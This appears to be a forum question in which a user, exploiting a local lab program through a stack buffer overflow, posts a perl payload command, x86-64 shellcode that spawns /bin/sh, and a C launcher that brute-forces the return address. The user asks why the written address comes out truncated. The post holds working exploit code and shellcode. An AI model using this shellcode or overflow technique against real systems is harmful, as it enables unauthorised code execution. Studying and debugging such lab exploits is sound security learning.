I have a vulnerable program exploitable through the command line:
```
./vuln $(perl -e 'print "\x90"x22'; cat shell; perl -e 'print "\x90"x22';perl -e 'print "\xf4\xdd\xff\xff\xff\x7f"')
����������������������H1��;H1�QH�/bin//shWH��@0����������������������������
$
```
Now I want to use a C program to be able to brute force the return address, but
I'm having an issue while trying to fill the injected buffer (it goes through a vulnerable strcpy so as to overwrite rip).
```c
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

int offset;
char shell[28] = {"\x48\x31\xc0\xb0\x3b\x48\x31\xc9\x51\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\x40\x30\xf6\x0f\x05"};

int main(int argc, char *argv[])
{
    int i;
    char buffer[78];
    offset = atoi(argv[1]);

    unsigned long get_sp()
    {
        __asm__("mov %rsp, %rax");
    }

    unsigned long ret, rsp;
    rsp = get_sp();
    ret = rsp + offset;
    printf("%lx\n", ret);

    for (i = 0; i < 78; i += 6)
        *(buffer + i) = ret; // HERE THE PROBLEM

    memset(buffer, '\x90', 22);
    strncpy(&buffer[22], shell, strlen(shell));
    execl("./vuln", "vuln", buffer, NULL);
}
```
Here is the output; as you may notice, the address is cut. Can you tell me why?
```
./exploit 52
7fffffffddf4
����������������������H1��;H1�QH�/bin//shWH��@0�
```
Full post: Setting a return address in a simple C exploit